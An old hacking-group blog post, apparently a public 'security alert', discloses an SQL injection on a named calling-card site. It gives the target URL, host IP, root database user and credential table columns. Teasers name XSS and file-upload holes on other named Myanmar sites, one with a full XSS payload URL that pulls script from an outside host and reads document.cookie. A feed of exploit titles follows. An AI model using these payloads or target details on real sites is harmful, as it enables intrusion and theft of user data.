Security Alert to BamarTalk.com (Web Vulnerability)

Home / Hacking, News, Security / Security Alert to BamarTalk.com (Web Vulnerability)

February 24, 2010 PlanetCreator 0 Comments 0 tags

Hi, BamarTalk.comâ€™s Webmaster

This is PlanetCreatorâ€™s Security Te@am & Hackers Group, PlanetCreator has reported Critical SQL Injection vulnerability on Bamar Talk International Calling Cards – Cheap Call to Myanmarâ€™s Website.

Informed to : ‘[email protected]’; ‘[email protected]’; ‘[email protected]’; ‘[email protected]’; ‘[email protected]’

Sent Wed 2/24/2010 7:12 AM
Some of your Webâ€™s Data Information are as follow,

Applications: â€”â€”â€”â€”PlanetCreatorâ€™s_Universal_Advanced_Internet_Security_T00L
System Time: â€”â€”â€”â€” (UTC+08:00) Kuala Lumpur, Singapore, 2/24/2010 5:56:19 AM
Target: Â Â Â Â Â Â http://www.bamartalk.com/information.php?info_id=1
Host IP:Â Â Â Â Â Â 67.18.18.10
Web Server: Â Â Â Microsoft-IIS/6.0
Powered-by: Â Â Â ASP.NET – PHP/5.2.6
Current User: Â Â Â root@localhost
Current DB: Â Â Â voipswitch
System User: Â Â Â root@localhost
DB User & Pass: Â Â Â root:*Hidden Pass for Security Reason:localhost

Table Name â€”â€”â€”â€” Columns
usersÂ Â Â Â Â â€”â€”â€”â€” city, phone, login, email, password
settingsÂ Â â€”â€”â€”â€” id, name

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Unrestricted File Upload @ Web-Based Teaching System Myanmar

Critical Unrestricted File Upload vulnerability found @ Web-Based Teaching System (Myanmar) URL : http://www.wbts.com.mm Malicious Attacker can upload some file to server without permission ! And It has persistent XSS

Critical persistent xss vulnerabilities at IPAY : Myanmar Online payment Official Site

This evening, I found a fascinatedÂ big bill board “IPAY” http://www.ipay.com.mm at Thamine Junction, Yangon, Myanmar. Then, I said my friend “googl3group” about it, and saidÂ “NO XSS, NO SQL

[local] glibc 2.38 - Buffer Overflow
on February 11, 2026 at 12:00 am
glibc 2.38 - Buffer Overflow
[remote] Windows 10.0.17763.7009 - spoofing vulnerability
on February 11, 2026 at 12:00 am
Windows 10.0.17763.7009 - spoofing vulnerability
[webapps] motionEye 0.43.1b4 - RCE
on February 11, 2026 at 12:00 am
motionEye 0.43.1b4 - RCE
[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
on February 4, 2026 at 12:00 am
FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
[local] Docker Desktop 4.44.3 - Unauthenticated API Exposure
on February 4, 2026 at 12:00 am
Docker Desktop 4.44.3 - Unauthenticated API Exposure